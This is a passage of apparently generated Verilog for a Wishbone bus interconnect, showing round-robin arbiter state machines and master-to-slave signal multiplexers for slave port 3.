                    if ( s3_msel_arb2_req[6] ) 
                    begin
                        s3_msel_arb2_next_state = s3_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s3_msel_arb2_req[7] ) 
                        begin
                            s3_msel_arb2_next_state = s3_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s3_msel_arb2_req[0] ) 
                            begin
                                s3_msel_arb2_next_state = s3_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s3_msel_arb2_req[1] ) 
                                begin
                                    s3_msel_arb2_next_state = s3_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb2_req[2] ) 
                                    begin
                                        s3_msel_arb2_next_state = s3_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb2_req[3] ) 
                                        begin
                                            s3_msel_arb2_next_state = s3_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb2_grant5:
        begin
            if (  !( s3_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s3_msel_arb2_req[6] ) 
                begin
                    s3_msel_arb2_next_state = s3_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s3_msel_arb2_req[7] ) 
                    begin
                        s3_msel_arb2_next_state = s3_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s3_msel_arb2_req[0] ) 
                        begin
                            s3_msel_arb2_next_state = s3_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s3_msel_arb2_req[1] ) 
                            begin
                                s3_msel_arb2_next_state = s3_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s3_msel_arb2_req[2] ) 
                                begin
                                    s3_msel_arb2_next_state = s3_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb2_req[3] ) 
                                    begin
                                        s3_msel_arb2_next_state = s3_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb2_req[4] ) 
                                        begin
                                            s3_msel_arb2_next_state = s3_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb2_grant6:
        begin
            if (  !( s3_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s3_msel_arb2_req[7] ) 
                begin
                    s3_msel_arb2_next_state = s3_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s3_msel_arb2_req[0] ) 
                    begin
                        s3_msel_arb2_next_state = s3_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s3_msel_arb2_req[1] ) 
                        begin
                            s3_msel_arb2_next_state = s3_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s3_msel_arb2_req[2] ) 
                            begin
                                s3_msel_arb2_next_state = s3_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s3_msel_arb2_req[3] ) 
                                begin
                                    s3_msel_arb2_next_state = s3_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb2_req[4] ) 
                                    begin
                                        s3_msel_arb2_next_state = s3_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb2_req[5] ) 
                                        begin
                                            s3_msel_arb2_next_state = s3_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb2_grant7:
        begin
            if (  !( s3_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s3_msel_arb2_req[0] ) 
                begin
                    s3_msel_arb2_next_state = s3_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s3_msel_arb2_req[1] ) 
                    begin
                        s3_msel_arb2_next_state = s3_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s3_msel_arb2_req[2] ) 
                        begin
                            s3_msel_arb2_next_state = s3_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s3_msel_arb2_req[3] ) 
                            begin
                                s3_msel_arb2_next_state = s3_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s3_msel_arb2_req[4] ) 
                                begin
                                    s3_msel_arb2_next_state = s3_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb2_req[5] ) 
                                    begin
                                        s3_msel_arb2_next_state = s3_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb2_req[6] ) 
                                        begin
                                            s3_msel_arb2_next_state = s3_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s3_msel_arb3_req = { ( s3_msel_req[7] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'd3 ) ), ( s3_msel_req[6] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'd3 ) ), ( s3_msel_req[5] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'd3 ) ), ( s3_msel_req[4] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'd3 ) ), ( s3_msel_req[3] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'd3 ) ), ( s3_msel_req[2] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'd3 ) ), ( s3_msel_req[1] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'd3 ) ), ( s3_msel_req[0] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s3_msel_arb3_state <= s3_msel_arb3_grant0;
        end
        else
        begin 
            s3_msel_arb3_state <= s3_msel_arb3_next_state;
        end
    end
    always @ (  s3_msel_arb3_state or  { ( s3_msel_req[7] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'd3 ) ), ( s3_msel_req[6] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'd3 ) ), ( s3_msel_req[5] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'd3 ) ), ( s3_msel_req[4] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'd3 ) ), ( s3_msel_req[3] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'd3 ) ), ( s3_msel_req[2] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'd3 ) ), ( s3_msel_req[1] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'd3 ) ), ( s3_msel_req[0] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s3_msel_arb3_next_state = s3_msel_arb3_state;
        case ( s3_msel_arb3_state ) 
        s3_msel_arb3_grant0:
        begin
            if (  !( s3_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s3_msel_arb3_req[1] ) 
                begin
                    s3_msel_arb3_next_state = s3_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s3_msel_arb3_req[2] ) 
                    begin
                        s3_msel_arb3_next_state = s3_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s3_msel_arb3_req[3] ) 
                        begin
                            s3_msel_arb3_next_state = s3_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s3_msel_arb3_req[4] ) 
                            begin
                                s3_msel_arb3_next_state = s3_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s3_msel_arb3_req[5] ) 
                                begin
                                    s3_msel_arb3_next_state = s3_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb3_req[6] ) 
                                    begin
                                        s3_msel_arb3_next_state = s3_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb3_req[7] ) 
                                        begin
                                            s3_msel_arb3_next_state = s3_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb3_grant1:
        begin
            if (  !( s3_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s3_msel_arb3_req[2] ) 
                begin
                    s3_msel_arb3_next_state = s3_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s3_msel_arb3_req[3] ) 
                    begin
                        s3_msel_arb3_next_state = s3_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s3_msel_arb3_req[4] ) 
                        begin
                            s3_msel_arb3_next_state = s3_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s3_msel_arb3_req[5] ) 
                            begin
                                s3_msel_arb3_next_state = s3_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s3_msel_arb3_req[6] ) 
                                begin
                                    s3_msel_arb3_next_state = s3_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb3_req[7] ) 
                                    begin
                                        s3_msel_arb3_next_state = s3_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb3_req[0] ) 
                                        begin
                                            s3_msel_arb3_next_state = s3_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb3_grant2:
        begin
            if (  !( s3_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s3_msel_arb3_req[3] ) 
                begin
                    s3_msel_arb3_next_state = s3_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s3_msel_arb3_req[4] ) 
                    begin
                        s3_msel_arb3_next_state = s3_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s3_msel_arb3_req[5] ) 
                        begin
                            s3_msel_arb3_next_state = s3_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s3_msel_arb3_req[6] ) 
                            begin
                                s3_msel_arb3_next_state = s3_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s3_msel_arb3_req[7] ) 
                                begin
                                    s3_msel_arb3_next_state = s3_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb3_req[0] ) 
                                    begin
                                        s3_msel_arb3_next_state = s3_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb3_req[1] ) 
                                        begin
                                            s3_msel_arb3_next_state = s3_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb3_grant3:
        begin
            if (  !( s3_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s3_msel_arb3_req[4] ) 
                begin
                    s3_msel_arb3_next_state = s3_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s3_msel_arb3_req[5] ) 
                    begin
                        s3_msel_arb3_next_state = s3_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s3_msel_arb3_req[6] ) 
                        begin
                            s3_msel_arb3_next_state = s3_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s3_msel_arb3_req[7] ) 
                            begin
                                s3_msel_arb3_next_state = s3_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s3_msel_arb3_req[0] ) 
                                begin
                                    s3_msel_arb3_next_state = s3_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb3_req[1] ) 
                                    begin
                                        s3_msel_arb3_next_state = s3_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb3_req[2] ) 
                                        begin
                                            s3_msel_arb3_next_state = s3_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb3_grant4:
        begin
            if (  !( s3_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s3_msel_arb3_req[5] ) 
                begin
                    s3_msel_arb3_next_state = s3_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s3_msel_arb3_req[6] ) 
                    begin
                        s3_msel_arb3_next_state = s3_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s3_msel_arb3_req[7] ) 
                        begin
                            s3_msel_arb3_next_state = s3_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s3_msel_arb3_req[0] ) 
                            begin
                                s3_msel_arb3_next_state = s3_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s3_msel_arb3_req[1] ) 
                                begin
                                    s3_msel_arb3_next_state = s3_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb3_req[2] ) 
                                    begin
                                        s3_msel_arb3_next_state = s3_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb3_req[3] ) 
                                        begin
                                            s3_msel_arb3_next_state = s3_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb3_grant5:
        begin
            if (  !( s3_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s3_msel_arb3_req[6] ) 
                begin
                    s3_msel_arb3_next_state = s3_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s3_msel_arb3_req[7] ) 
                    begin
                        s3_msel_arb3_next_state = s3_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s3_msel_arb3_req[0] ) 
                        begin
                            s3_msel_arb3_next_state = s3_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s3_msel_arb3_req[1] ) 
                            begin
                                s3_msel_arb3_next_state = s3_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s3_msel_arb3_req[2] ) 
                                begin
                                    s3_msel_arb3_next_state = s3_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb3_req[3] ) 
                                    begin
                                        s3_msel_arb3_next_state = s3_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb3_req[4] ) 
                                        begin
                                            s3_msel_arb3_next_state = s3_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb3_grant6:
        begin
            if (  !( s3_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s3_msel_arb3_req[7] ) 
                begin
                    s3_msel_arb3_next_state = s3_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s3_msel_arb3_req[0] ) 
                    begin
                        s3_msel_arb3_next_state = s3_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s3_msel_arb3_req[1] ) 
                        begin
                            s3_msel_arb3_next_state = s3_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s3_msel_arb3_req[2] ) 
                            begin
                                s3_msel_arb3_next_state = s3_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s3_msel_arb3_req[3] ) 
                                begin
                                    s3_msel_arb3_next_state = s3_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb3_req[4] ) 
                                    begin
                                        s3_msel_arb3_next_state = s3_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb3_req[5] ) 
                                        begin
                                            s3_msel_arb3_next_state = s3_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb3_grant7:
        begin
            if (  !( s3_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s3_msel_arb3_req[0] ) 
                begin
                    s3_msel_arb3_next_state = s3_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s3_msel_arb3_req[1] ) 
                    begin
                        s3_msel_arb3_next_state = s3_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s3_msel_arb3_req[2] ) 
                        begin
                            s3_msel_arb3_next_state = s3_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s3_msel_arb3_req[3] ) 
                            begin
                                s3_msel_arb3_next_state = s3_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s3_msel_arb3_req[4] ) 
                                begin
                                    s3_msel_arb3_next_state = s3_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb3_req[5] ) 
                                    begin
                                        s3_msel_arb3_next_state = s3_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb3_req[6] ) 
                                        begin
                                            s3_msel_arb3_next_state = s3_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s3_msel_pri_out or  s3_msel_arb0_state or  s3_msel_arb1_state)
    begin
        if ( s3_msel_pri_out[0] ) 
        begin
            s3_msel_sel1 = s3_msel_arb1_state;
        end
        else
        begin 
            s3_msel_sel1 = s3_msel_arb0_state;
        end
    end
    always @ (  s3_msel_pri_out or  s3_msel_arb0_state or  s3_msel_arb1_state or  s3_msel_arb2_state or  s3_msel_arb3_state)
    begin
        case ( s3_msel_pri_out ) 
        2'd0:
        begin
            s3_msel_sel2 = s3_msel_arb0_state;
        end
        2'd1:
        begin
            s3_msel_sel2 = s3_msel_arb1_state;
        end
        2'd2:
        begin
            s3_msel_sel2 = s3_msel_arb2_state;
        end
        2'd3:
        begin
            s3_msel_sel2 = s3_msel_arb3_state;
        end
        endcase
    end
    assign s3_mast_sel = ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s3_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s3_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s3_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s3_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s3_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s3_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s3_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s3_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s3_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s3_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s3_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s3_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s3_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s3_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s3_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s3_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s3_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s3_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s3_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s3_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s3_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s3_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s3_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s3_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s3_m0_data_o = s3_data_i;
    assign s3_m1_data_o = s3_data_i;
    assign s3_m2_data_o = s3_data_i;
    assign s3_m3_data_o = s3_data_i;
    assign s3_m4_data_o = s3_data_i;
    assign s3_m5_data_o = s3_data_i;
    assign s3_m6_data_o = s3_data_i;
    assign s3_m7_data_o = s3_data_i;
    always @ (  ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s3_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s3_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s3_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s3_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s3_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s3_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s3_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s3_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s3_m0_cyc_r <= m0_s3_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s3_m1_cyc_r <= m1_s3_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s3_m2_cyc_r <= m2_s3_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s3_m3_cyc_r <= m3_s3_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s3_m4_cyc_r <= m4_s3_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s3_m5_cyc_r <= m5_s3_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s3_m6_cyc_r <= m6_s3_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s3_m7_cyc_r <= m7_s3_cyc_o;
    end
    always @ (  ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) or  m0_s3_cyc_o or  m1_s3_cyc_o or  m2_s3_cyc_o or  m3_s3_cyc_o or  m4_s3_cyc_o or  m5_s3_cyc_o or  m6_s3_cyc_o or  m7_s3_cyc_o or  s3_m0_cyc_r or  s3_m1_cyc_r or  s3_m2_cyc_r or  s3_m3_cyc_r or  s3_m4_cyc_r or  s3_m5_cyc_r or  s3_m6_cyc_r or  s3_m7_cyc_r)
    begin
        case ( ( ( ( s3_pri_sel == 2'd0 ) ) ? ( s3_arb_state ) : ( ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( s3_msel_arb0_state ) : ( ( ( ( s3_msel_pri_sel == 2'd1 ) ) ? ( s3_msel_sel1 ) : ( s3_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s3_wb_cyc_o = ( m0_s3_cyc_o & s3_m0_cyc_r );
        end
        3'd1:
        begin
            s3_wb_cyc_o = ( m1_s3_cyc_o & s3_m1_cyc_r );
        end
        3'd2:
        begin
            s3_wb_cyc_o = ( m2_s3_cyc_o & s3_m2_cyc_r );
        end
        3'd3:
        begin
            s3_wb_cyc_o = ( m3_s3_cyc_o & s3_m3_cyc_r );
        end
        3'd4:
        begin
            s3_wb_cyc_o = ( m4_s3_cyc_o & s3_m4_cyc_r );
        end
        3'd5:
        begin
            s3_wb_cyc_o = ( m5_s3_cyc_o & s3_m5_cyc_r );
        end
        3'd6:
        begin
            s3_wb_cyc_o = ( m6_s3_cyc_o & s3_m6_cyc_r );
        end
        3'd7:
        begin
            s3_wb_cyc_o = ( m7_s3_cyc_o & s3_m7_cyc_r );
        end
        endcase
    end
